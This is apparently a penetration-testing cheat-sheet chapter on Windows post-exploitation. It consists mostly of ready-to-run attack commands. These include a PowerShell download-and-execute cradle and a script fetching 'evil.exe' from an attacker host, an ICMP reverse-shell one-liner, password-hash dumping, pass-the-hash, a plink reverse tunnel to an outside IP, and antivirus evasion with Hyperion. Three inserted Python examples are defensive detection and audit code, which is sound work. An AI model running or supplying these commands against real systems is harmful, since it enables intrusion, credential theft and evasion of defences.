Chapter 4 - Windows Post-Exploitation
“Practice the principle of least privilege. Do not log into a computer with administrator rights unless you must do so to perform specific tasks. Running your computer as an administrator (or as a Power User in Windows) leaves your computer vulnerable to security risks and exploits. Simply visiting an unfamiliar Internet site with these high-privilege accounts can cause extreme damage to your computer, such as reformatting your hard drive, deleting all your files, and creating a new user account with administrative access.”
— Indiana University (Best practices for computer security)
This is the phase I like to refer to as second-pass enumeration, or enumeration from the inside. Now that we've gained a foothold in the network, it is crucial to run all of our enumeration again from the ground up, this time as an inside actor.
Resources
Windows Privilege Escalation Fundamentals - FuzzySecurity
Windows PrivEsc Check - GitHub
Windows Exploit Suggester - GitHub
Encyclopaedia Of Windows Privilege Escalation - YouTube
Level Up! Practical Windows Privilege Escalation - YouTube
Windows Privilege Escalation methods for PenTesters
Windows Attacks: AT is the new Black - YouTube
Analyzing local privilege escalations in win2k
The System Challenge - Decoder's Blog
The Wallstreet of Windows Binaries
Windows Operating System Archaeology
Breaking .NET Through Serialization
Windows Kernel Exploits - GitHub
Cross Compiling from Kali
Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c
Transpile Python into EXE
Kali> python pyinstaller.py --onefile file.py
Uploading Files
Kali> cp /usr/share/windows-binaries/nc.exe .
Kali> upx -9 nc.exe
Kali> wine exe2bat.exe nc.exe nc.txt
Security Stuff
Exploitation Techniques and Mitigations on Windows
Authentication Registry Keys - MSDN
Demystifying AppContainers in Windows 8 Part 1
Protected Processes in Windows
Intercepting System Calls on x86_64 Windows
Introduction to Windows Kernel Security
Windows Program Automatic Startup Locations
Demystifying the Windows Firewall
Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012 … and a new network attack
Bypassing Firewalls with Port 23
Pass the hash is dead long live LocalAccountTokenFilterPolicy
Getting Windows to play with itself: A PenTester's guide to Windows API abuse
AZURE
Compromise as a Service: our pleAZURE
Powershell Foo
Resources
Attacking ADFS Endpoints with PowerShell
PowerShell Secrets and Tactics
An Intro to PowerShell and how to use it for Evil
Offensive Active Directory with PowerShell
Low-Level Windows API Access From PowerShell - FuzzySecurity
Upgrade Shell
C:\> powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.10.1/file.txt')"
wget
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http://$ATTACKER/evil.exe" >> wget.ps1
echo $file = "new-exploit.exe" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1
C:\> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Execute ps1
C:\> powershell -exec bypass -windowstyle hidden -nop -file c:\path\to\file.ps1
List the NTFS alternate data streams of a file
C:\> Get-Item /path/to/file.zip -Stream *
Get permissions of directory/file
C:\> Get-ACL C:\path\to\file\or\directory
Packet testing
# TCP
# Setup TCP Listener ie: netcat
C:\> powershell -Command '$client = New-Object System.Net.Sockets.TcpClient;$client.Connect( "10.10.14.42", 8000 );[Byte[]] $packet = [Text.Encoding]::ASCII.GetBytes("pie");$client.Send($packet, $packet.Length);$client.Close();'
# UDP
# Setup UDP Listener ie: socat
C:\> powershell -Command '$client = New-Object System.Net.Sockets.UdpClient;$client.Connect( "10.10.14.42", 8000 );[Byte[]] $packet = [Text.Encoding]::ASCII.GetBytes("pie");$client.Send($packet, $packet.Length);$client.Close();'
# ICMP
Kali> sudo python icmpsh_m.py $ATTACKER $TARGET
C:\> powershell -Command '$client = New-Object System.Net.NetworkInformation.Ping;$options = New-Object System.Net.NetworkInformation.PingOptions;$options.DontFragment = $True;$packet = [Text.Encoding]::ASCII.GetBytes("pie");$client.Send("10.10.14.42", 500, $packet, $options);'
Reverse ICMP shell
Kali> sudo bash -c "echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all"
Kali> sudo python icmpsh_m.py $ATTACKER $TARGET
C:\> powershell -nop -Command "$IP = '10.10.14.42';$client = New-Object System.Net.NetworkInformation.Ping;$options = New-Object System.Net.NetworkInformation.PingOptions;$options.DontFragment = $true;$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes('pie'), $options);while($true){$comms = $client.Send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes(''), $options);if($comms.Buffer){ $cmd = ([Text.Encoding]::ASCII).GetString($comms.Buffer);$reply = (Invoke-Expression -Command $cmd | Out-String);$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes($reply), $options);}}"
Services
Windows Privilege Escalation via weak Service Permissions
The Art of Becoming TrustedInstaller
LDAP
5 Ways to find Systems running domain admin processes
PenTesting Active Directory Environments: CrapMapExec
Active Directory Privilege Relationships: BloodHound
Active Directory Architecture - MSDN
A Week of Evading Microsoft ATA Day 1
Dumping a domain's worth of passwords with mimikatz part 2
Attack Methods for gaining Domain Admin
Find AD users with empty passwords
Domain Trusts and why you should care
A PenTester's guide to group scoping
How to own any Windows network with group policy hijacking attacks
Kerberos
Kerberos Golden Ticket Protection
How to pass the ticket through SSH tunnels
From Pass the Hash to Pass the Ticket with no pain
Abusing Token Privileges for LPE
Dump Hashes
Dump windows password hashes efficiently part 1
I'll get your credentials... Later! - FuzzySecurity
Grab the Windows Secrets! - Decoder's Blog
C:\> fgdump.exe
C:\> type 127.0.0.1.pwdump
WCE
C:\> wce -w
PSExec
You need to be an admin already: it copies an executable to an admin share, registers it as a service and starts it.
Lateral Movement with Invoke-PsExec
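Detection logic for the behaviour just described, as an added Python example that is not from the page or from any of the tools it lists: a service registered and started through an admin share shows up in the System log as Event ID 7045 (a service was installed), and the records below are constructed samples of that event.

```python
import re

# Constructed records in the shape of System log Event ID 7045 ("A service was
# installed in the system"); sample data for this example, not real telemetry.
SAMPLE_7045 = [
    {"host": "DEV01", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"host": "DEV01", "ServiceName": "wuauserv",
     "ImagePath": r"%SystemRoot%\system32\svchost.exe -k netsvcs"},
    {"host": "FS02", "ServiceName": "svc7k2q",
     "ImagePath": r"\\127.0.0.1\ADMIN$\svc7k2q.exe"},
    {"host": "FS02", "ServiceName": "Spooler",
     "ImagePath": r"%SystemRoot%\System32\spoolsv.exe"},
]

# Sysinternals PsExec names its service PSEXESVC; clones pick random names, so the
# image path is the more durable signal: a binary launched straight from an
# administrative share, or dropped directly under %SystemRoot% (what ADMIN$ maps to).
KNOWN_SERVICE_NAMES = {"psexesvc"}
ADMIN_SHARE_RE = re.compile(r"^\\\\[^\\]+\\(ADMIN\$|C\$)\\", re.IGNORECASE)
SYSROOT_DROP_RE = re.compile(r"^%SystemRoot%\\[^\\]+\.exe$", re.IGNORECASE)


def classify(record):
    """Return the reasons (possibly none) a 7045 record looks like a PsExec-style install."""
    name = record["ServiceName"].lower()
    path = record["ImagePath"].strip()
    reasons = []
    if name in KNOWN_SERVICE_NAMES:
        reasons.append("service name matches PsExec (PSEXESVC)")
    if ADMIN_SHARE_RE.match(path):
        reasons.append("binary runs from an administrative share (ADMIN$/C$)")
    if SYSROOT_DROP_RE.match(path):
        reasons.append("executable dropped directly under %SystemRoot%")
    return reasons


def find_suspicious(records):
    """Return (host, service name, reasons) for every record that trips a rule."""
    hits = []
    for rec in records:
        reasons = classify(rec)
        if reasons:
            hits.append((rec["host"], rec["ServiceName"], reasons))
    return hits


if __name__ == "__main__":
    for host, name, reasons in find_suspicious(SAMPLE_7045):
        print(f"{host}: service {name!r}: " + "; ".join(reasons))
```

The same rules apply unchanged to Security event 4697 on hosts where service-install auditing is enabled.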
UAC
Anatomy of UAC Attacks - FuzzySecurity
WMIC
Insecure File Permissions
Elevating privileges by exploiting weak folder permissions
C:\> icacls example.exe
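An audit for the condition the linked post relies on, as an added Python example that is not from the page: it parses the output of the `icacls` command above (the two outputs below are constructed for hypothetical binaries) and reports every ACE that lets a low-privileged principal replace or rewrite a service binary.

```python
import re

# Constructed `icacls` output for two hypothetical service binaries; not captured from a host.
SAMPLE_AGENT = r"""C:\Acme\agent.exe BUILTIN\Users:(I)(F)
                  NT AUTHORITY\SYSTEM:(I)(F)
                  BUILTIN\Administrators:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""
SAMPLE_SVC = r"""C:\Other\svc.exe NT AUTHORITY\SYSTEM:(I)(F)
                 BUILTIN\Administrators:(I)(F)
                 BUILTIN\Users:(I)(RX)
                 NT AUTHORITY\Authenticated Users:(I)(RX,W)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals every local user holds, and icacls rights that allow replacing or rewriting the
# file (F full, M modify, W write, WD write data, AD append, WDAC write DACL, WO take ownership).
LOW_PRIV = {"everyone", r"builtin\users", r"nt authority\authenticated users",
            r"nt authority\interactive"}
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WDAC", "WO"}
ACE_RE = re.compile(r"^(?P<who>.+?):(?P<flags>(?:\([A-Z,]*\))+)$")


def parse_icacls(path, text):
    """Return [(principal, set_of_rights)] from the output of `icacls <path>`."""
    aces = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith(path):                 # first line is "<path> <first ACE>"
            line = line[len(path):].strip()
        if not line or line.startswith("Successfully processed"):
            continue
        m = ACE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised icacls line: {line!r}")
        groups = re.findall(r"\(([^)]*)\)", m["flags"])   # inheritance flags first, permission last
        aces.append((m["who"], set(groups[-1].split(","))))
    return aces


def writable_by_low_priv(path, text):
    """Principals from LOW_PRIV that hold a write-capable right on the binary."""
    return [who for who, rights in parse_icacls(path, text)
            if who.lower() in LOW_PRIV and rights & WRITE_RIGHTS]


if __name__ == "__main__":
    for path, out in ((r"C:\Acme\agent.exe", SAMPLE_AGENT), (r"C:\Other\svc.exe", SAMPLE_SVC)):
        print(path, "writable by:", writable_by_low_priv(path, out) or "no low-privileged principal")
```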
Insecure SYSVOL
C:\> net use z: \\dc01\SYSVOL
Z:\> dir /s Groups.xml
Z:\> copy
Kali> gpp-decrypt
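A defender-side audit of the Groups.xml hunt above, as an added Python example that is not part of the page: it walks a mounted SYSVOL copy (such as the Z: mapping) and reports which Group Policy Preferences items still carry a cpassword attribute, without decrypting anything, so the entries can be removed and the affected account passwords rotated. The file names and attribute names are those used by Group Policy Preferences; the sample XML is constructed and assumes UTF-8 files.

```python
import xml.etree.ElementTree as ET
from pathlib import Path

# Constructed Groups.xml in the layout of SYSVOL\<domain>\Policies\{GUID}\Machine\
# Preferences\Groups\Groups.xml; sample data for this example, not from a real domain.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{EXAMPLE-CLSID}">
  <User clsid="{EXAMPLE-CLSID}" name="Administrator (built-in)"
        changed="2014-02-11 09:31:12" uid="{EXAMPLE-UID-1}">
    <Properties action="U" newName="" fullName="" description=""
        cpassword="EXAMPLE-CPASSWORD-VALUE" changeLogon="0" noChange="1"
        neverExpires="1" acctDisabled="0" userName="Administrator (built-in)"/>
  </User>
  <User clsid="{EXAMPLE-CLSID}" name="helpdesk"
        changed="2019-06-01 10:00:00" uid="{EXAMPLE-UID-2}">
    <Properties action="U" newName="" fullName="" description=""
        changeLogon="0" noChange="0" neverExpires="0" acctDisabled="0" userName="helpdesk"/>
  </User>
</Groups>
"""

# Every Preferences file type that can embed a credential.
GPP_FILES = ("Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml")
# The attribute naming the account differs per file type; the first one present wins.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


def find_cpasswords(xml_text, source="<string>"):
    """Return (source, item tag, account, last changed) for each item with a cpassword.
    The encrypted value is neither returned nor decrypted; the finding is enough to act on."""
    findings = []
    for item in ET.fromstring(xml_text):          # one <User>, <Service>, <Task>, ... per item
        for props in item.iter("Properties"):
            if props.get("cpassword"):            # absent or empty means no stored password
                account = next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)),
                               item.get("name"))
                findings.append((source, item.tag, account, item.get("changed")))
    return findings


def scan_sysvol(sysvol_root):
    """Walk a mounted SYSVOL copy and collect findings from every preferences file."""
    findings = []
    for path in Path(sysvol_root).rglob("*.xml"):
        if path.name in GPP_FILES:
            findings.extend(find_cpasswords(path.read_text(encoding="utf-8-sig"), str(path)))
    return findings


if __name__ == "__main__":
    for src, tag, account, changed in find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml"):
        print(f"{src}: {tag} {account!r} carries a cpassword (last changed {changed})")
```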
RDP
DLL Injection
NTLM/v2
Practical guide to NTLM Relaying in 2017 AKA Getting a foothold in under 5 minutes
SMB Relay demystified and NTLMv2 Pwnage with Python
Token Stealing
Once you have admin access on a computer, you can use the tokens of the other users to access resources in the domain.
Passing the Hash
Kali> export SMBHASH="HASH"
Kali> pth-winexe -U administrator //$TARGET cmd
runas
Encapsulating SSH Traffic with httptunnel
# Bypass Notify with administrative account
$secpasswd = ConvertTo-SecureString "password" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential("Administrator", $secpasswd)
$computer = "DEV01"
# $mycreds and $computer feed the -Credential / -ComputerName parameters of the call that runs run.ps1 (e.g. Invoke-Command)
powershell -ExecutionPolicy Bypass -File c:\Windows\temp\run.ps1
# add ruleset for firewall
C:\> netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
C:\> netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
C:\> netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
C:\> netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
C:\> httptunnel_client.exe
# upload /usr/share/windows-binaries/plink.exe then setup port forward
C:\> plink -l root -pw pass -R 3389:127.0.0.1:3389 208.68.234.99 -P 3000
# Bypass Anti-virus
Kali> cp payload.exe newpayload.exe
Kali> cp /usr/share/windows-binaries/Hyperion-1.0.zip .
Kali> unzip Hyperion-1.0.zip && cd Hyperion-1.0
Kali> i586-mingw32msvc-g++ Src/Crypter/*.cpp -o hyperion.exe
Kali> wine hyperion.exe ../newpayload.exe ../crypted.exe